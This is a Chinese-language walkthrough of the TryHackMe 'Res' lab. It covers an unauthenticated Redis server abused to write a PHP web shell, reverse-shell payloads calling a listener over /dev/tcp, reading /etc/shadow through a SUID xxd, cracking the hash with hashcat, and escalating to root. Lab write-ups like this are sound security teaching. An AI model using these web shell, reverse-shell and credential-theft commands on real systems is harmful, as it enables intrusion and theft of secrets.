首页 > 其他分享 >【THM】Res练习

【THM】Res练习

时间:2024-10-04 21:34:48浏览次数:8  
标签:shell Res 数据库 练习 redis THM 端口 Redis txt

【THM】Res练习

与本文相关的TryHackMe实验房间链接:TryHackMe | Res

简介:在这个半引导式挑战中,使用内存中的数据结构入侵易受攻击的数据库服务器!

TryHackMe

你准备好接受挑战了吗?

image-20241004172058444

第一题:扫描机器,有多少端口是开放的?

第一步

端口扫描

首先使用nmap对端口进行扫描

nmap -sV -sC -p- 10.10.183.82

-sV 启用服务版本检测,获取开放端口上运行服务的版本信息。

-sC 启用默认脚本扫描,运行一组预定义的脚本进行更深入的检测。

-p- 扫描所有端口

建议使用另一个命令,扫描全端口跑了天久

nmap -sV -sC -p1-10000 10.10.183.82

-p1-10000 扫描1-10000端口

可以发现目标开放了2个端口:80/tcp http服务、6379/tcp redis数据库服务

image-20241004190508207

第二题:服务器上安装的数据库管理系统是什么?

由端口扫描可知使用了redis数据库管理系统

第三题:数据库管理系统在哪个端口上运行?

由端口扫描可知redis数据库管理系统在6379端口上运行

第四题:服务器上安装的管理系统版本是什么?

由端口扫描可知redis数据库管理系统版本为6.0.7

image-20241004211111382

第五题:破坏机器并找到user.txt

第一步

访问网站

访问10.110.183.82观察web应用

image-20241004203108140

发现只有一个默认的Apache HTTP server登录页面,没有找到可以利用的地方

第二步

分析Redis相关漏洞

首先学习Redis是什么

【趣话Redis第一弹】我是Redis,MySQL大哥被我坑惨了!

HackTricks | HackTricks的redis渗透模块中学到了可以上传shell

首先我们先尝试无密码连接上redis服务:

redis-cli -h 10.10.183.82

redis-cli Redis 命令行界面工具

-h 指定要连接的 Redis 服务器的主机名或 IP 地址

成功连接:

image-20241004204901788

第三步

准备shell页面

使用以下命令设置Redis数据库的持久化目录:

config set dir /var/www/html

config 用于操作 Redis 配置的命令

set 设置一个指定的配置项

dir 要设置的配置项,这里表示 Redis 数据库的持久化目录

使用以下命令设置持久化数据库的文件名

config set dbfilename redis.php

dbfilename 要设置的配置项,表示 Redis 持久化数据的文件名

接下来我们可以上传的可就多了,我们可以弄一个shell

set test "<?php system($_GET['shell']); ?>"

test 要设置的键名

上传后可以用蚁剑连接或者传输以下参数得到shell

cmd=php -r '$sock=fsockopen("10.10.146.90","6666");exec("/bin/bash -i 0>&3 2>&3 1>&3");'

但我的攻击机没有所以直接用的反弹shell,反弹shell如下:

set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.10.146.90/6666 0>&1'\"); ?>"

首先监听我设置的6666端口,设置键名后访问redis.php成功得到shell:

image-20241004210735190

使用以下命令使得反弹shell稳定化:

python -c "import pty; pty.spawn('/bin/bash')"

第四步

寻找user.txt

我们可以在vianka的用户目录中找到user.txt

image-20241004210920805

image-20241004211121614

第六题:本地用户的密码是什么?

第一步

查看/etc/shadow文件

使用以下命令:

cat /etc/shadow

image-20241004211328125

莫得权限,我们看看我们有什么权限:

find / -type f -perm -04000 -ls 2>/dev/null

image-20241004211440714

xxd 是一个用于在 Unix/Linux 系统中处理二进制文件的命令行工具。它可以将文件的内容以十六进制和 ASCII 格式进行查看和转换。

我们可以使用xxd命令来查看文件内容:

xxd /etc/shadow | xxd -r

-r 将输入的十六进制数据转换回二进制格式

我们将输出的shadow十六进制模式转换成了原始的二进制内容:

image-20241004211731937

得到了:

$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0

第二步

hash解密

先去example_hashes hashcat wiki]查询hash加密的类型:

image-20241004212218887

我们使用hashcat进行破解(这里用了攻击机默认的字典):

hashcat -a 0 -m 1800 '$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0'  /usr/share/wordlists/rockyou.txt

image-20241004212304298

我们得到密码为beautiful1

image-20241004212356731

第七题:提升权限并获取root.txt

第一步

登录本地用户

我们有了vianka的密码,那么我们就可以使用本地用户登录了(没有开放ssh服务所以不能用ssh连接):

su vianka

image-20241004212834283

为了能够访问root目录,我们提升权限:

sudo -i

成功了,得到root.txt:

image-20241004213131784

image-20241004213155447

标签:shell,Res,数据库,练习,redis,THM,端口,Redis,txt
From: https://www.cnblogs.com/handsomexuejian/p/18447319

相关文章

  • Light Image Resizer v7.0.7 解锁版下载及安装方法(图片大小调整工具)
    LightImageResizer是一款简单又实用的图片大小调整工具,软件通过缩小分辨率或在硬盘驱动器中移动它们来组织您的照片。LightImageResizer是那些将数码照片和图像存储在PC上以及想要调整大小,压缩,转换,创建副本,创建缩略图、导入或组织照片的人的完美工具。具体步骤如下:下载地......
  • pbootcms模板报错提示PHP Warning: Unknown: open_basedir restriction
    当PbootCMS模板出现报错提示 PHPWarning:Unknown:open_basedirrestrictionineffect.File 时,通常是因为PHP的 open_basedir 限制设置不当。以下是解决该问题的简要步骤:解决步骤检查PHP配置文件(php.ini):确认 open_basedir 设置是否正确。修改 open_b......
  • Restore .bacpac file to DEV VM D365 FO
    Restore.bacpacfiletoDEVVMD365FO Restore.bacpacfiletoDevelopmentVMSteps: 1.       TakeBackupofAxDBdatabasefromDevelopmentVM 2.       OpenCommandPrompt(RunasAdministrator)GoToPath(VersionFoldermightbedif......
  • rectify、amend、correct、emend、redress和revise的区别
    rectify、amend、correct、emend、redress、remedy和revise都可以表示纠正错误。rectify暗示这种修改的正当性和必要性。通常,rectify的对象是那些大多数人认为错误的事情,例如:thehotelmanagementpromisedtorectifytheproblem.酒店管理层承诺整改问题。amend暗示做出的都......
  • VulnHub2018_DeRPnStiNK靶机渗透练习
    据说该靶机有四个flag扫描扫描附近主机arp-scan-l扫主目录扫端口nmap-sS-sV-n-T4-p-192.168.xx.xx结果如下StartingNmap7.94SVN(https://nmap.org)at2024-09-3019:25CSTNmapscanreportfor192.168.93.131Hostisup(0.0024slatency).Notshown:......
  • Java面向对象第四章方法重写与多态练习题
    练习1:使用重写优化电子宠物系统需求说明使用方法重写优化电子宠物系统,实现如下效果 packagecom.hz.ch02;/***猫类*@author26255**/publicclassCatextendsFather{ privateStringsex; publicCat(Stringname,inthealth,intlove,Stringse......
  • WPF FindResource,Resource[key] SystemColors TryFindResource
    //xaml<Windowx:Class="WpfApp3.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.micr......
  • BP - 点击劫持 Clickjacking (UI redressing)
    Whatisclickjacking?点击劫持是一种基于界面的攻击,通过点击诱饵网站中的其他内容,诱骗用户点击隐藏网站上的可操作内容。iframe基于会话的CSRF令牌无法缓解点击劫持攻击,因为目标会话是通过从真实网站加载的内容建立的,并且所有请求都在域内发生。CSRF令牌被放入请求中,并作为......
  • 【THM】Git Happens练习
    【THM】GitHappens练习与本文相关的TryHackMe实验房间链接:TryHackMe|GitHappens简介:老板让我创建一个原型代码,所以它就在这里!我们甚至使用了一种叫做“版本控制”的东西,使部署变得非常容易!你能找到应用程序的密码吗?第一题:找到超级机密的密码第一步端口扫描首先使......
  • 59_初识搜索引擎_搜索相关参数梳理以及bouncing results问题解决方案
    1、preference决定了哪些shard会被用来执行搜索操作_primary,_primary_first,_local,_only_node:xyz,_prefer_node:xyz,_shards:2,3bouncingresults问题,两个document排序,field值相同;不同的shard上,可能排序不同;每次请求轮询打到不同的replicashard上;每次页面上看到的搜索......